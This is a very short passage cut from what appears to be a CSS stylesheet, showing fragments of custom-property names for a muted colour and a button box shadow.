--muted-color);--button-box-sha